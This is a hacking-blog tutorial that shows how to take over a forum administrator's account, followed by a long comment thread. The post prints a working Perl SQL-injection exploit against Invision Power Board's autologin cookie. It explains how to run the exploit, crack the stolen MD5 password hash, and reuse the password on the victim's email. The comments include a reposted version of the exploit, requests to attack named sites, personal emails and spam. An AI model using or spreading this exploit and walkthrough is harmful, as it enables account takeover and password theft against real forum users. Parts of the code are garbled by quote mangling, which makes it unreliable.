How to Hack into forums
This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you lazy fucks, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.
So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:
CODE
#!/usr/bin/perl -w
################################################## ################
# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com (http://remusomega.com/)
################################################## ################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(“Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (“0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :
“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;
my @cookie = (‘Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }
}
print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;
exit;
What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
Your going to want to go and get ActivePerl. I am sure it’s here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting “OK”.
So now you have Perl installed. Open up “My Computer”, and then click on “Local Disk (C:/)”. In there, you should see a folder named “Perl”. Open up that folder, and within “Perl”, you should see another folder named “bin”. Open up “bin”. Now that your in, drag and drop “ipb.pl” from your desktop, into “bin”.
Alrighty. Now everything is fine, and you’re ready to Pwn some FAGS …
What your going to want to do now, is open up your command prompt. If you don’t know how, please quit this site, and die…. Start – Run – CMD
Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace “http://hackingsite.com/forum” with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don’t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person’s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash’s before continuing reading.
Done? You understand the very basics of MD5s? Good. You’re probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use “Cain & Able”, which is a great MD5 cracker availiable at ‘http://odix.it’.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call “GOOGLE”
Good luck!
Popularity: 7% [?]
Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.
Hello Everybody
Just wanted to share my new experience.
If your Windows XP denies to run due to an error corresponding to lost HAL.DLL, invalid Boot.ini or any other critical system boot files you can fix this by using the XP installation CD. Simply boot from your XP Setup CD and enter the Recovery Console. Then launch “attrib -H -R -S” on the C:\Boot.ini file and remove it. Launch “Bootcfg /Rebuild” and then Fixboot
Cheers,
Carl
what is the ipb.pl file and where is it?
the ipb.pl file is the code that you pasted into notepad. make sure that you save the file as ipb.pl
Okay, you lost me after the administrator step. Seriously, haha, I have no idea what all that code information was all about or how to access my cookies and all that jazz. Maybe I’m just a ‘noob’, but I honestly don’t know what to do.
oh yah baby i hacked a forum , fucked it up and then got banned . LOL!!!
they r now fucking restoring their stuff HAHAAH!!! thanx dude!!
Hi people,
I am new to this forum http://www.hungry-hackers.com and hope that anybody can
help me with the forex – I am looking for an introduction
for beginners. I have already some knowledge about shares. (Hope “How to Hack into forums” is the fitting category.)
I have the big hope that the recent turbulences in the forex exchange promise
quick and easy money not only for the experts. Any help is so much appreciated.
Thanks,
Max
I need to know how to get into sprints forem to change finacle information on my account. The back door to there system is Nviev.Nextel.com/Nview but it wont work on my computer system. I know they work off of Ensemble but dont know how to access it. Please help if u can>
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
Hi, just registered today, can someone give me some suggestions on which ebooks or guides are good for newbies like me?
Hacking Truths has joined forces with TradePub.com to offer you a new, exciting, and entirely free professional resource. Visit http://www.hungry-hackers.tradepub.com today to browse our selection of complimentary Industry magazines, white papers, webinars, podcasts, and more across 34 industry sectors. No credit cards, coupons, or promo codes required.
Yea I get the same error as Prey.
same here , looks like the code is somehow old the site that made this shit doesnt even work anymore
Hi Guys,
i’m really enjoying the forum so, excuse my bad english
cheers
http://www.squidoo.com/firstchoicepharmacy
exploit jpeg…
Maybe, but I’m not sure it’for everyone….
damn it i dont have any CLUE!!! please any make a step by step guide
THX
Hello All,
I am new here and just wanted to introduc myself.
I have a few questions but I will first search for the answers before asking them just in case they have been asnwered.
THanks!
Hi everybody, just joined today.
Hello to ya all!
Hello…
Prey said:
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
I have got the same problem, any help pls?
Excellent site http://www.hungry-hackers.com and I am really pleased to see you have what I am actually looking for here and this this post is exactly what I am interested in. It’s taken me literally 2 hours and 07 minutes of searching the web to find you (just kidding!) so I shall be pleased to become a regular visitor
gud bt u didnt give the 1.3.1 forum
Hello! I was trying to find a FAQ page but I couldn’t. Can you show it to me please
Hope everyone is doing excellent today
Excited to be here!
wow exellent
ive been searching for ages how to do this
I hope there’s good info here
Can anyone tell me their opinion of the forum thus far.
Looking to meet new people to exchange info with,so leave me your name
Bye,
HEy can u help me hack this site. http://www.phunland.com/forum/index.php i want to hack the main mod his id i think is 32 plz do tis for me contact. Rhett-97@hotmail.com
Oh wait sorry his username is link007
You made a point of differentiating yourself from a hacker, and then use that very term over and over. Jesus.
Prey said:
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
I have got the same problem, any help pls?
Hey All, it’s always nice to meet new people..Just wanted to introduce my self as new comer into the forum and for you all please feel free to ad me to your buddy list
this is good. ive done it . ppl can add me for better explainations and buyings , my id is h4ck_44@yahoo.com
Hey i just wanted to say hi to everyone.
something is wrong with the code
it saying this
Unrecognized character \x1D in column 12 at ipb.pl line 13
What’s up, is there anybody else here?
If there’s anyone else here, let me know.
Oh, and yes I’m a real person LOL.
Later,
Prey said:
Getting this error when running “perl ipb.pl” at CMD (C:\Perl\bin)…
“use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
What am I doing wrong?
I have got the same problem, any help pls?
I have the same. help? email: gorchin.325@gmail.com
I get an error when I try running perl ipb.pl in CMD with everything done. about an unregognized character
This looks cool so far, what’s up people?
If there are any real people here looking to network, leave me a post.
Oh, and yes I’m a real person LOL.
Bye,
can some1 hlp me to hack aeriagames?
i never hacked before and they give me perm ban for “suspicious hacking activities” like they say and never answer on my mails. if u asked me before ban about hacking games i’ll sayd that that is stuped cuz games r 4 fun but aeria really have to c what is hacking since they ban more then 300000 players without any reason and any prove that they brake rules of gameplaying. in a fact aeria didn’t respect rules what they have posted.
i tryed with this to enter in forum but it didn’t work. any better idea?
pls hlp
hey man wats up?
just explain me what da fuck wrong twith this
when i typed on cmd to access the ipb.pl file its give a fucking messege like this
“unrecognized chracter \377 at c:\perl\bin\ipb.pl line 1″
wats wrong with the code
wat da fuck i hve to do now? im fucking end of the process and its eating ma head just push me man
your fucking amz man nice works
The new season of survivor this fall is going to be great.
Ok here’s the solution to your error “use” not allowed in expression ipb.pl line 10, at end of line
syntax error at ipb.pl line 10, near “use LWP:UserAgent”
Unrecognized character \x1D in column 12 at ipb.pl line 13.
Its not you its the coding when you save it to a note pad look at the code very closely notice all of the ” ” ” was warped when you tryed to save it and now looks bold so you need to delete then put it back and in the my @charset line it looks like this (“1 then a little square box delete the boxes on 0-9 and a-f and relace it with ” that should get you going.
Getting message…Not Exploitable in command prompt. Can you help???
Tnks
sam …could please just send a new scrip without any error ?
thx^^
Just wanted to say hello all. This is my first post.
I hope to learn a lot here.
Can someone please talk with me on msn who’ve understood how to hack forums?
Please add me on msn : Nikhil071993@hotmail.com
Where to save the ipb.pl file?
Ok ive almost done it.
But when i do this step :
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
It says, “Not Exploitable!”
Yeah can you please send me the proper code script with no errors, cheers. colem8@hotmail.com
Ok, now i corrected all the “”" on the code script and now i’m getting this huge mumblejumble back. Please someone help or send me the correct script saved into notepad and email it to me colem8@hotmail.com. Cheers
I tried it, and the perl script had errors.
i am having same prob of unrecognized character can any one please paste correct code
Sam, i have changed every ” to normal but it still says “unrecognized character x\18 in column 23 at line 1pb.pl at line 13″.
Help please?
Hi ,
Im new to the forum and just wanted to introduce myself, i’m Jim . I’ve been lurking around the forum for quite some time looking up info but finally decided to make an account.
i really wanted tell you that your forum is stuning
thank you
hello!
I have the following thouble…
“Unrecognized character \224 at ipb.pl line 10″
please somebody now what can I do???
You have to go back and delete every single ” and ‘ and re-type them again.
Can anyone tell me if this site is hacakable ?
http://www.moobynet.freeforums.org/
As I have been told no chance ?
Help please! in the command prompt i cant type in the text to go to my bin folder because i live in sweden and i dont have the slash thingy i have the one that goes to the other side “/” not the other one, i have a site that i want to hack though but i cant do it because of that. if someone could hack that site for me please email me at Gm4uz@live.se, im willing to do anything
Thanks Swivle, I will try. But this hack work in forum vBulletin Version 3.8.1 ?????
Hello
I am looking for the free Credit Report and Repairt kit
Please let me know if you have the free Credit Report & Repair Kit.
Thanks and Best Regards,
Unrecognised character /x94, at column 12 at ipb.pl line 10…
I changed all of the ” and ‘
So whats wrong? :/
Im at the last part but when i type in the sites URL it shows that i need to open a file
My computer is running slow what steps can I do to fix it?
I have got the thing working after figuring it all out.
only problem is i am ip banned from the forum i want to try this on.
so it gives me a hash of all 0
how can i run this through a proxy? i think the ip ban is effecting how this works. i would rather not wait to get to a new computer and new ip address before trying this again
that error you guys are getting you need to copy and paste this code. then click save as. save the file as ipb.pl and in the encoding field at the bottom you need to select UTF-8 it is probably being saved as ANSI and thats where you get the error.
here is the proper code. just remember to save it as ipb.pl and make sure it is in UTF-8 encoding.
#!/usr/bin/perl -w
##################################################################
Just paste the outputted cookie into
# This one actually works
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://www.h4cky0u.org
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(“Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. “;
exit;
}
my @charset = (“0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ‘(.*)Log In(.*)’;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current “;
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
When saving the code, make sure you save it as unicode and not save it as anson. if you save it in inicode format… the characters wont change.
this new code is still not working for me, i tried both saving as unicode and UTF-8. Yet still getting problem at column 12 line 13.
I used the new code and I keep getting an error on column 12 at line 13 as well
I went threw the new code and I replaced
my $current = $charset[$j];
my $sql = ( $iver $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
(((((((with the old code at the top)))))))
my $current = $charset[$j];
my $sql = ( $iver $cpre . “member_id=31337420;
” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
I was able to run the => ipb.pl http://hackingsite.com/forum 2 1 <= command on a few forums and I either got a Hash with all 0's or No Exploit error message
I tried that but still not working, i'm getting error at 39 near "$iver $cpre"
hello,
I still not get this to work..
Can anyone please help me, step by step?
Email me: storselger@hotmail.com
Important.
Thank You…
So i had this virus, Security Tool, so i removed it manually by watching a video on youtube. then when i removed it, the next time i logged onto my computer it said Windows could not find Logon.exe. I’ve tried System Restore (I have an XP by the way) and I don’t know what to do next. Do i need to pay for someone to fix it!? [url=http://unlockiphone22.com]unlock iphone 3g[/url]
hi there my command and promt doesnt seem to find cd C:\Perl\bin can any 1 help please aaron1986@live.com add me
this is a great site
Ha! You america hackers a joke. Great
america company hire coders from
russia to make web site. I challenge any
one hack our site. It at http://www.lisecc.com.
You no break code. We guarantee. I pay you
$100 if your crack.
Please help. I copied the CORRECT code and saved it as ipb.pl, I then went to access the file from the command prompt. It said, “Can’t open Perl script “ipb.pl”: No such file or directory
Please either comment back here, or e-mail me at kiwiattack@yahoo.com .
Your help is greatly appreciated.
unreconized charachter\x93; marked by ….etc
whyyyyy me ?
plz correct the script
I’ve done everything, put the desired url in place; and it gives me,
Unrecognized character \xE2; marked by agent(<– HERE near c
lumn 12 at C:\Perl\bin\ipb.pl line 10.
I see there are some unknown variables, such as my browser version, the site login url, etc. So like say, if I wanted to login on freeforums.org forums, I'd have to find the url for login, correct?
Regardless, good tutorial.
Note : If you have any Query related to the above Article please Post it to the Support Forum.
Leave your response!
Popular Posts
Follow Me
Free SMS Alerts
For Indian Users
Send START HACKING <cityname> to 575758
* for more info click here
Recent Posts
Most Commented
Categories
Archives
Translator
Introducing Myself
Blogroll